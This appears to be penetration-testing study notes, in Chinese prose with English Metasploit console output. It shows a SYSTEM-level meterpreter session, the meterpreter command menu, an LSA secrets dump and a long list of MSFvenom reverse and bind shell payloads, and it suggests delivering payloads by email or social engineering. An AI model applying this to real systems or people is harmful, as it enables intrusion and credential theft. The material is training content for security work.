Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ MS01 10.10.10.129:443 -> 10.10.10.205:50501 (10.10.10.205)
Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel
Secret : _SC_Alerter / service 'Alerter' with username : NT AUTHORITY\LocalService
Secret : _SC_ALG / service 'ALG' with username : NT AUTHORITY\LocalService
Secret : _SC_aspnet_state / service 'aspnet_state' with username : NT AUTHORITY\NetworkService
Secret : _SC_Dhcp / service 'Dhcp' with username : NT AUTHORITY\NetworkService
Secret : _SC_Dnscache / service 'Dnscache' with username : NT AUTHORITY\NetworkService
Secret : _SC_LicenseService / service 'LicenseService' with username : NT AUTHORITY\NetworkService
Secret : _SC_LmHosts / service 'LmHosts' with username : NT AUTHORITY\LocalService
Secret : _SC_MSDTC / service 'MSDTC' with username : NT AUTHORITY\NetworkService
Secret : _SC_RpcLocator / service 'RpcLocator' with username : NT AUTHORITY\NetworkService
Secret : _SC_RpcSs / service 'RpcSs' with username : NT AUTHORITY\NetworkService
Secret : _SC_stisvc / service 'stisvc' with username : NT AUTHORITY\LocalService
Secret : _SC_TlntSvr / service 'TlntSvr' with username : NT AUTHORITY\LocalService
Secret : _SC_WebClient / service 'WebClient' with username : NT AUTHORITY\LocalService
MSFvenom
概述
在 Metasploit 中使用自动化攻击需要我们通过网络到达一个易受攻击的目标机器。对于 run the exploit module 、 deliver the payload 和 establish the shell session ,我们首先需要与系统进行通信。这可能通过在内网中存在或在一个有路由到目标所在网络的网络中实现。会有我们没有直接网络访问易受攻击的目标机器的情况。在这些情况下,我们需要在有效载荷如何被传递并在系统上执行方面变得巧妙。一种这样的方式可能是使用 MSFvenom 来制作一个有效载荷,并通过电子邮件消息或其他社交工程手段发送,以促使用户执行该文件。
Name Description ---- ----------- linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell linux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'. linux/x86/shell_find_port Spawn a shell on an established connection linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x86/shell_reverse_tcp_ipv6 Connect back to attacker and spawn a command shell over IPv6 linux/zarch/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless) linux/zarch/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless) linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless) mainframe/shell_reverse_tcp Listen for a connection and spawn a command shell. This implementation does not include ebcdic character translation, so a client wi th translation capabilities is required. MSF handles this automatically. multi/meterpreter/reverse_http Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP multi/meterpreter/reverse_https Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS netware/shell/reverse_tcp Connect to the NetWare console (staged). Connect back to the attacker nodejs/shell_bind_tcp Creates an interactive shell via nodejs nodejs/shell_reverse_tcp Creates an interactive shell via nodejs nodejs/shell_reverse_tcp_ssl Creates an interactive shell via nodejs, uses SSL osx/armle/execute/bind_tcp Spawn a command shell (staged). Listen for a connection osx/armle/execute/reverse_tcp Spawn a command shell (staged). Connect back to the attacker osx/armle/shell/bind_tcp Spawn a command shell (staged). Listen for a connection osx/armle/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker osx/armle/shell_bind_tcp Listen for a connection and spawn a command shell osx/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell osx/armle/vibrate Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller library has been loaded. Based on work by Charlie Miller
windows/dllinject/bind_hidden_tcp Inject a DLL via a reflective loader. Listen for a connection from a hidden port and spawn a command shell to the allowed host. windows/dllinject/bind_ipv6_tcp Inject a DLL via a reflective loader. Listen for an IPv6 connection (Windows x86) windows/dllinject/bind_ipv6_tcp_uuid Inject a DLL via a reflective loader. Listen for an IPv6 connection with UUID Support (Windows x86) windows/dllinject/bind_named_pipe Inject a DLL via a reflective loader. Listen for a pipe connection (Windows x86) windows/dllinject/bind_nonx_tcp Inject a DLL via a reflective loader. Listen for a connection (No NX) windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86) windows/dllinject/bind_tcp_rc4 Inject a DLL via a reflective loader. Listen for a connection windows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86) windows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection windows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop /hop.php to the PHP server you wish to use as a hop. windows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet) windows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP windows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6 windows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX) windows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker windows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly) windows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker windows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker windows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker windows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support windows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)
我们可以看到一些细节,这些细节将有助于我们进一步理解有效载荷。首先,我们可以看到有效载荷的命名约定几乎总是以列出目标操作系统开头( Linux 、 Windows 、 MacOS 、 mainframe 等)。我们还可以看到一些有效载荷被描述为( staged )或( stageless )。